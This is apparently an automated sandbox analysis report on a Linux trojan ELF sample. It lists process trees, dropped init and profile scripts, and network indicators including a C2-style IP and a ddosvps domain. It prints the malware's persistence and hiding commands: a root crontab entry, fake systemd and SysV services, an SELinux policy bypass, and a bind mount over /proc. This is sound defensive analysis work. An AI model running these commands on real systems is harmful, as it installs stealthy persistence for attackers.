Edit tour

Linux Analysis Report
ausNOyj9by.elf

Overview

General Information

Sample name:	ausNOyj9by.elf renamed because original name is a hash value
Original sample name:	ac46e9818cd936fbfcba5effd7f4e850.elf
Analysis ID:	1466257
MD5:	ac46e9818cd936fbfcba5effd7f4e850
SHA1:	9a058ce2e1a413ae24b0c23e49b68d1b2f3f2777
SHA256:	e23cd1ab03a3a03803e920efb2001fc6c4ae34c50ef647271898edc1c87ccde4
Tags:	32elfintel
Infos:

Detection

Score:	72
Range:	0 - 100
Whitelisted:	false

Signatures

Multi AV Scanner detection for submitted file

Drops files in suspicious directories

Machine Learning detection for sample

Sample tries to persist itself using /etc/profile

Sample tries to persist itself using System V runlevels

Sample tries to persist itself using cron

Sample tries to set files in /etc globally writable

Creates hidden files and/or directories

Creates hidden files without content (potentially used as a mutex)

Detected TCP or UDP traffic on non-standard ports

Executes commands using a shell command-line interpreter

Executes the "systemctl" command used for controlling the systemd system and service manager

Reads the 'hosts' file potentially containing internal network hosts

Sample has stripped symbol table

Sample tries to set the executable flag

Sleeps for long times indicative of sandbox evasion

Uses the "uname" system call to query kernel version information (possible evasion)

Writes shell script file to disk with an unusual file extension

Writes shell script files to disk

Classification

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1466257
Start date and time:	2024-07-02 18:12:23 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	ausNOyj9by.elf renamed because original name is a hash value
Original Sample Name:	ac46e9818cd936fbfcba5effd7f4e850.elf
Detection:	MAL
Classification:	mal72.spre.troj.evad.linELF@0/57@146/0

Warnings

VT rate limit hit for: ausNOyj9by.elf

Runtime Messages

Command:	/tmp/ausNOyj9by.elf
PID:	5482
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:
Standard Error:

Process Tree

system is lnxubuntu20

ausNOyj9by.elf (PID: 5482, Parent: 5408, MD5: ac46e9818cd936fbfcba5effd7f4e850) Arguments: /tmp/ausNOyj9by.elf

ausNOyj9by.elf New Fork (PID: 5486, Parent: 5482)

ausNOyj9by.elf (PID: 5486, Parent: 5482, MD5: ac46e9818cd936fbfcba5effd7f4e850) Arguments: /tmp/ausNOyj9by.elf

ausNOyj9by.elf New Fork (PID: 5494, Parent: 5486)

bash (PID: 5494, Parent: 5486, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c "cd /boot;systemctl daemon-reload;systemctl enable quotaon.service;systemctl start quotaon.service;journalctl -xe --no-pager"

bash New Fork (PID: 5495, Parent: 5494)

systemctl (PID: 5495, Parent: 5494, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload

bash New Fork (PID: 5499, Parent: 5494)

systemctl (PID: 5499, Parent: 5494, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable quotaon.service

bash New Fork (PID: 5503, Parent: 5494)

systemctl (PID: 5503, Parent: 5494, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start quotaon.service

bash New Fork (PID: 5504, Parent: 5494)

journalctl (PID: 5504, Parent: 5494, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: journalctl -xe --no-pager

ausNOyj9by.elf New Fork (PID: 5505, Parent: 5486)

bash (PID: 5505, Parent: 5486, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c "cd /boot;ausearch -c 'system.pub' --raw | audit2allow -M my-Systemmod;semodule -X 300 -i my-Systemmod.pp"

bash New Fork (PID: 5506, Parent: 5505)

bash New Fork (PID: 5507, Parent: 5505)

bash New Fork (PID: 5508, Parent: 5505)

ausNOyj9by.elf New Fork (PID: 5511, Parent: 5486)

bash (PID: 5511, Parent: 5486, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c "echo \"*/1 * * * * root /.mod \" >> /etc/crontab"

ausNOyj9by.elf New Fork (PID: 5512, Parent: 5486)

update-rc.d (PID: 5512, Parent: 5486, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: update-rc.d dns-udp4 defaults

update-rc.d New Fork (PID: 5513, Parent: 5512)

systemctl (PID: 5513, Parent: 5512, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload

ausNOyj9by.elf New Fork (PID: 5517, Parent: 5486)

mount (PID: 5517, Parent: 5486, MD5: 92b20aa8b155ecd3ba9414aa477ef565) Arguments: mount -o bind /tmp/ /proc/5486

ausNOyj9by.elf New Fork (PID: 5539, Parent: 5486)

service (PID: 5539, Parent: 5486, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service cron start

service New Fork (PID: 5540, Parent: 5539)

basename (PID: 5540, Parent: 5539, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service

service New Fork (PID: 5541, Parent: 5539)

basename (PID: 5541, Parent: 5539, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service

service New Fork (PID: 5542, Parent: 5539)

systemctl (PID: 5542, Parent: 5539, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active multi-user.target

service New Fork (PID: 5543, Parent: 5539)

service New Fork (PID: 5544, Parent: 5543)

systemctl (PID: 5544, Parent: 5543, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl list-unit-files --full --type=socket

service New Fork (PID: 5545, Parent: 5543)

sed (PID: 5545, Parent: 5543, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p

systemctl (PID: 5539, Parent: 5486, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start cron.service

ausNOyj9by.elf New Fork (PID: 5574, Parent: 5486)

systemctl (PID: 5574, Parent: 5486, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start crond.service

systemd New Fork (PID: 5497, Parent: 5496)

snapd-env-generator (PID: 5497, Parent: 5496, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

systemd New Fork (PID: 5501, Parent: 5500)

snapd-env-generator (PID: 5501, Parent: 5500, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

systemd New Fork (PID: 5515, Parent: 5514)

snapd-env-generator (PID: 5515, Parent: 5514, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

udisksd New Fork (PID: 5528, Parent: 803)

dumpe2fs (PID: 5528, Parent: 803, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

systemd New Fork (PID: 5564, Parent: 1)

cron (PID: 5564, Parent: 1, MD5: 2c82564ff5cc862c89392b061c7fbd59) Arguments: /usr/sbin/cron -f

cron New Fork (PID: 5609, Parent: 5564)

cron New Fork (PID: 5617, Parent: 5609)

sh (PID: 5617, Parent: 5609, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/.mod "

sh New Fork (PID: 5618, Parent: 5617)

.mod (PID: 5618, Parent: 5617, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /.mod

.mod New Fork (PID: 5619, Parent: 5618)

libgdi.so.0.8.2 (PID: 5619, Parent: 5618, MD5: ac46e9818cd936fbfcba5effd7f4e850) Arguments: /usr/lib/libgdi.so.0.8.2

libgdi.so.0.8.2 New Fork (PID: 5623, Parent: 5619)

libgdi.so.0.8.2 (PID: 5623, Parent: 5619, MD5: ac46e9818cd936fbfcba5effd7f4e850) Arguments: /usr/lib/libgdi.so.0.8.2

systemd New Fork (PID: 5641, Parent: 1)

cron (PID: 5641, Parent: 1, MD5: 2c82564ff5cc862c89392b061c7fbd59) Arguments: /usr/sbin/cron -f

cron New Fork (PID: 5670, Parent: 5641)

cron New Fork (PID: 5678, Parent: 5670)

sh (PID: 5678, Parent: 5670, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/.mod "

sh New Fork (PID: 5679, Parent: 5678)

.mod (PID: 5679, Parent: 5678, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /.mod

.mod New Fork (PID: 5680, Parent: 5679)

libgdi.so.0.8.2 (PID: 5680, Parent: 5679, MD5: ac46e9818cd936fbfcba5effd7f4e850) Arguments: /usr/lib/libgdi.so.0.8.2

libgdi.so.0.8.2 New Fork (PID: 5684, Parent: 5680)

libgdi.so.0.8.2 (PID: 5684, Parent: 5680, MD5: ac46e9818cd936fbfcba5effd7f4e850) Arguments: /usr/lib/libgdi.so.0.8.2

systemd New Fork (PID: 5704, Parent: 1)

cron (PID: 5704, Parent: 1, MD5: 2c82564ff5cc862c89392b061c7fbd59) Arguments: /usr/sbin/cron -f

cleanup

Yara Signatures

⊘No yara matches

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: ausNOyj9by.elf

ReversingLabs: Detection: 31%

Machine Learning detection for sample

Source: ausNOyj9by.elf

Joe Sandbox ML: detected

Source: global traffic

TCP traffic: 192.168.2.14:44534 -> 209.141.53.247:7788

Source: /tmp/ausNOyj9by.elf (PID: 5486)

Reads hosts file: /etc/hosts

Jump to behavior

Source: global traffic

DNS traffic detected: DNS query: botbot.ddosvps.cc

Source: ausNOyj9by.elf	String found in binary or memory: http://.css
Source: ausNOyj9by.elf	String found in binary or memory: http://.jpg
Source: ausNOyj9by.elf	String found in binary or memory: http://html4/loose.dtd

Source: ELF static info symbol of initial sample

.symtab present: no

Source: classification engine

Classification label: mal72.spre.troj.evad.linELF@0/57@146/0

Source: ELF file section

Submission: ausNOyj9by.elf

Persistence and Installation Behavior

Sample tries to persist itself using /etc/profile

Source: /tmp/ausNOyj9by.elf (PID: 5486)	File: /etc/profile.d/bash.cfg.sh			Jump to behavior
Source: /tmp/ausNOyj9by.elf (PID: 5486)	File: /etc/profile.d/gateway.sh			Jump to behavior

Sample tries to persist itself using System V runlevels

Source: /usr/sbin/update-rc.d (PID: 5512)	File: /etc/rc2.d/S01dns-udp4 -> ../init.d/dns-udp4	Jump to behavior
Source: /usr/sbin/update-rc.d (PID: 5512)	File: /etc/rc3.d/S01dns-udp4 -> ../init.d/dns-udp4	Jump to behavior
Source: /usr/sbin/update-rc.d (PID: 5512)	File: /etc/rc4.d/S01dns-udp4 -> ../init.d/dns-udp4	Jump to behavior
Source: /usr/sbin/update-rc.d (PID: 5512)	File: /etc/rc5.d/S01dns-udp4 -> ../init.d/dns-udp4	Jump to behavior

Sample tries to persist itself using cron

Source: /bin/bash (PID: 5511)

File: /etc/crontab

Jump to behavior

Sample tries to set files in /etc globally writable

Source: /tmp/ausNOyj9by.elf (PID: 5486)

File: /etc/profile.d/bash.cfg (bits: - usr: rx grp: rx all: rwx)

Jump to behavior

Source: /tmp/ausNOyj9by.elf (PID: 5486)	File: /etc/.ffff4444	Jump to behavior
Source: /tmp/ausNOyj9by.elf (PID: 5486)	File: /etc/.cfg	Jump to behavior
Source: /tmp/ausNOyj9by.elf (PID: 5486)	File: /etc/.cfg	Jump to behavior
Source: /tmp/ausNOyj9by.elf (PID: 5486)	File: /.mod	Jump to behavior
Source: /.mod (PID: 5618)	Directory: /.mod	Jump to behavior
Source: /usr/lib/libgdi.so.0.8.2 (PID: 5623)	File: /etc/.ffff4444	Jump to behavior
Source: /usr/lib/libgdi.so.0.8.2 (PID: 5623)	File: /etc/.cfg	Jump to behavior
Source: /.mod (PID: 5679)	Directory: /.mod	Jump to behavior
Source: /usr/lib/libgdi.so.0.8.2 (PID: 5684)	File: /etc/.ffff4444	Jump to behavior
Source: /usr/lib/libgdi.so.0.8.2 (PID: 5684)	File: /etc/.cfg	Jump to behavior

Source: /usr/lib/libgdi.so.0.8.2 (PID: 5684)

Empty hidden file: /etc/.ffff4444

Jump to behavior

Source: /tmp/ausNOyj9by.elf (PID: 5494)	Shell command executed: /bin/bash -c "cd /boot;systemctl daemon-reload;systemctl enable quotaon.service;systemctl start quotaon.service;journalctl -xe --no-pager"	Jump to behavior
Source: /tmp/ausNOyj9by.elf (PID: 5505)	Shell command executed: /bin/bash -c "cd /boot;ausearch -c 'system.pub' --raw \| audit2allow -M my-Systemmod;semodule -X 300 -i my-Systemmod.pp"	Jump to behavior
Source: /tmp/ausNOyj9by.elf (PID: 5511)	Shell command executed: /bin/bash -c "echo \"/1 * * * root /.mod \" >> /etc/crontab"	Jump to behavior
Source: /usr/sbin/cron (PID: 5617)	Shell command executed: /bin/sh -c "/.mod "	Jump to behavior
Source: /usr/sbin/cron (PID: 5678)	Shell command executed: /bin/sh -c "/.mod "	Jump to behavior

Source: /bin/bash (PID: 5495)	Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reload	Jump to behavior
Source: /bin/bash (PID: 5499)	Systemctl executable: /usr/bin/systemctl -> systemctl enable quotaon.service	Jump to behavior
Source: /bin/bash (PID: 5503)	Systemctl executable: /usr/bin/systemctl -> systemctl start quotaon.service	Jump to behavior
Source: /usr/sbin/update-rc.d (PID: 5513)	Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reload	Jump to behavior
Source: /usr/sbin/service (PID: 5539)	Systemctl executable: /usr/bin/systemctl -> systemctl start cron.service	Jump to behavior
Source: /usr/sbin/service (PID: 5542)	Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active multi-user.target	Jump to behavior
Source: /usr/sbin/service (PID: 5544)	Systemctl executable: /usr/bin/systemctl -> systemctl list-unit-files --full --type=socket	Jump to behavior
Source: /tmp/ausNOyj9by.elf (PID: 5574)	Systemctl executable: /usr/bin/systemctl -> systemctl start crond.service	Jump to behavior

Source: /tmp/ausNOyj9by.elf (PID: 5486)	File: /boot/system.pub (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/ausNOyj9by.elf (PID: 5486)	File: /etc/profile.d/bash.cfg (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/ausNOyj9by.elf (PID: 5486)	File: /usr/lib/libgdi.so.0.8.2 (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/ausNOyj9by.elf (PID: 5486)	File: /usr/lib/system.mark (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Source: /tmp/ausNOyj9by.elf (PID: 5486)	Writes shell script file to disk with an unusual file extension: /.mod	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	Writes shell script file to disk with an unusual file extension: /etc/init.d/acpid	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	Writes shell script file to disk with an unusual file extension: /etc/init.d/alsa-utils	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	Writes shell script file to disk with an unusual file extension: /etc/init.d/anacron	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	Writes shell script file to disk with an unusual file extension: /etc/init.d/apparmor	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	Writes shell script file to disk with an unusual file extension: /etc/init.d/apport	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	Writes shell script file to disk with an unusual file extension: /etc/init.d/avahi-daemon	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	Writes shell script file to disk with an unusual file extension: /etc/init.d/binfmt-support	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	Writes shell script file to disk with an unusual file extension: /etc/init.d/bluetooth	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	Writes shell script file to disk with an unusual file extension: /etc/init.d/cron	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	Writes shell script file to disk with an unusual file extension: /etc/init.d/cryptdisks	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	Writes shell script file to disk with an unusual file extension: /etc/init.d/cryptdisks-early	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	Writes shell script file to disk with an unusual file extension: /etc/init.d/cups	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	Writes shell script file to disk with an unusual file extension: /etc/init.d/cups-browsed	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	Writes shell script file to disk with an unusual file extension: /etc/init.d/dbus	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	Writes shell script file to disk with an unusual file extension: /etc/init.d/gdm3	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	Writes shell script file to disk with an unusual file extension: /etc/init.d/hddtemp	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	Writes shell script file to disk with an unusual file extension: /etc/init.d/irqbalance	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	Writes shell script file to disk with an unusual file extension: /etc/init.d/iscsid	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	Writes shell script file to disk with an unusual file extension: /etc/init.d/kmod	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	Writes shell script file to disk with an unusual file extension: /etc/init.d/lightdm	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	Writes shell script file to disk with an unusual file extension: /etc/init.d/lm-sensors	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	Writes shell script file to disk with an unusual file extension: /etc/init.d/lvm2-lvmpolld	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	Writes shell script file to disk with an unusual file extension: /etc/init.d/mono-xsp4	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	Writes shell script file to disk with an unusual file extension: /etc/init.d/multipath-tools	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	Writes shell script file to disk with an unusual file extension: /etc/init.d/open-iscsi	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	Writes shell script file to disk with an unusual file extension: /etc/init.d/open-vm-tools	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	Writes shell script file to disk with an unusual file extension: /etc/init.d/plymouth	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	Writes shell script file to disk with an unusual file extension: /etc/init.d/plymouth-log	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	Writes shell script file to disk with an unusual file extension: /etc/init.d/procps	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	Writes shell script file to disk with an unusual file extension: /etc/init.d/rsync	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	Writes shell script file to disk with an unusual file extension: /etc/init.d/rsyslog	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	Writes shell script file to disk with an unusual file extension: /etc/init.d/saned	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	Writes shell script file to disk with an unusual file extension: /etc/init.d/screen-cleanup	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	Writes shell script file to disk with an unusual file extension: /etc/init.d/spice-vdagent	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	Writes shell script file to disk with an unusual file extension: /etc/init.d/ssh	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	Writes shell script file to disk with an unusual file extension: /etc/init.d/udev	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	Writes shell script file to disk with an unusual file extension: /etc/init.d/ufw	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	Writes shell script file to disk with an unusual file extension: /etc/init.d/unattended-upgrades	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	Writes shell script file to disk with an unusual file extension: /etc/init.d/uuidd	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	Writes shell script file to disk with an unusual file extension: /etc/init.d/x11-common	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	Writes shell script file to disk with an unusual file extension: /etc/init.d/dns-udp4	Jump to dropped file

Source: /tmp/ausNOyj9by.elf (PID: 5486)	Shell script file created: /etc/profile.d/bash.cfg.sh	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	Shell script file created: /etc/init.d/console-setup.sh	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	Shell script file created: /etc/init.d/hwclock.sh	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	Shell script file created: /etc/init.d/keyboard-setup.sh	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	Shell script file created: /etc/profile.d/gateway.sh	Jump to dropped file

Source: /usr/sbin/service (PID: 5545)

Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Drops files in suspicious directories

Source: /tmp/ausNOyj9by.elf (PID: 5486)	File: /etc/init.d/acpid	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	File: /etc/init.d/alsa-utils	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	File: /etc/init.d/anacron	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	File: /etc/init.d/apparmor	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	File: /etc/init.d/apport	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	File: /etc/init.d/avahi-daemon	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	File: /etc/init.d/binfmt-support	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	File: /etc/init.d/bluetooth	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	File: /etc/init.d/console-setup.sh	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	File: /etc/init.d/cron	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	File: /etc/init.d/cryptdisks	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	File: /etc/init.d/cryptdisks-early	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	File: /etc/init.d/cups	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	File: /etc/init.d/cups-browsed	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	File: /etc/init.d/dbus	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	File: /etc/init.d/gdm3	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	File: /etc/init.d/hddtemp	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	File: /etc/init.d/hwclock.sh	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	File: /etc/init.d/irqbalance	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	File: /etc/init.d/iscsid	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	File: /etc/init.d/keyboard-setup.sh	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	File: /etc/init.d/kmod	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	File: /etc/init.d/lightdm	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	File: /etc/init.d/lm-sensors	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	File: /etc/init.d/lvm2-lvmpolld	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	File: /etc/init.d/mono-xsp4	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	File: /etc/init.d/multipath-tools	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	File: /etc/init.d/open-iscsi	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	File: /etc/init.d/open-vm-tools	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	File: /etc/init.d/plymouth	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	File: /etc/init.d/plymouth-log	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	File: /etc/init.d/procps	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	File: /etc/init.d/rsync	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	File: /etc/init.d/rsyslog	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	File: /etc/init.d/saned	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	File: /etc/init.d/screen-cleanup	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	File: /etc/init.d/spice-vdagent	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	File: /etc/init.d/ssh	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	File: /etc/init.d/udev	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	File: /etc/init.d/ufw	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	File: /etc/init.d/unattended-upgrades	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	File: /etc/init.d/uuidd	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	File: /etc/init.d/x11-common	Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)	File: /etc/init.d/dns-udp4	Jump to dropped file

Source: /usr/sbin/cron (PID: 5564)	Sleeps longer then 60s: 60.0s	Jump to behavior
Source: /usr/sbin/cron (PID: 5641)	Sleeps longer then 60s: 60.0s	Jump to behavior
Source: /usr/sbin/cron (PID: 5704)	Sleeps longer then 60s: 60.0s	Jump to behavior

Source: /tmp/ausNOyj9by.elf (PID: 5486)	Queries kernel information via 'uname':	Jump to behavior
Source: /bin/bash (PID: 5494)	Queries kernel information via 'uname':	Jump to behavior
Source: /bin/bash (PID: 5505)	Queries kernel information via 'uname':	Jump to behavior
Source: /bin/bash (PID: 5511)	Queries kernel information via 'uname':	Jump to behavior
Source: /.mod (PID: 5618)	Queries kernel information via 'uname':	Jump to behavior
Source: /.mod (PID: 5679)	Queries kernel information via 'uname':	Jump to behavior

Source: open-vm-tools.14.dr	Binary or memory string: # Check if we're running inside VMWare
Source: open-vm-tools.14.dr	Binary or memory string: start-stop-daemon --start --quiet --pidfile /var/run/vmtoolsd.pid --exec /usr/bin/vmtoolsd --test > /dev/null \|\| exit 1
Source: open-vm-tools.14.dr	Binary or memory string: if ! ${checktool} \| grep -iq vmware; then
Source: open-vm-tools.14.dr	Binary or memory string: rm -f /var/run/vmtoolsd.pid
Source: open-vm-tools.14.dr	Binary or memory string: checktool='vmware-checkvm'
Source: open-vm-tools.14.dr	Binary or memory string: start-stop-daemon --stop --quiet --retry=TERM/30/KILL/5 --pidfile /var/run/vmtoolsd.pid --exec /usr/bin/vmtoolsd
Source: open-vm-tools.14.dr	Binary or memory string: log_daemon_msg "Stopping open-vm guest daemon" "vmtoolsd"
Source: open-vm-tools.14.dr	Binary or memory string: echo "open-vm-tools: not starting as this is not a VMware VM"
Source: open-vm-tools.14.dr	Binary or memory string: start-stop-daemon --start --quiet --pidfile /var/run/vmtoolsd.pid --exec /usr/bin/vmtoolsd -- --background /var/run/vmtoolsd.pid \|\| exit 2
Source: open-vm-tools.14.dr	Binary or memory string: log_daemon_msg "Starting open-vm daemon" "vmtoolsd"
Source: open-vm-tools.14.dr	Binary or memory string: status_of_proc -p /var/run/vmtoolsd.pid /usr/bin/vmtoolsd vmtoolsd && exit 0 \|\| exit $?

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	2 Scripting	Valid Accounts	1 Command and Scripting Interpreter	1 Unix Shell Configuration Modification	1 Unix Shell Configuration Modification	1 Masquerading	OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	1 Non-Standard Port	Exfiltration Over Other Network Medium	1 Data Manipulation
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Systemd Service	1 Systemd Service	1 Hide Artifacts	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Scripting	Logon Script (Windows)	1 Virtualization/Sandbox Evasion	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 File and Directory Permissions Modification	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Hidden Files and Directories	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
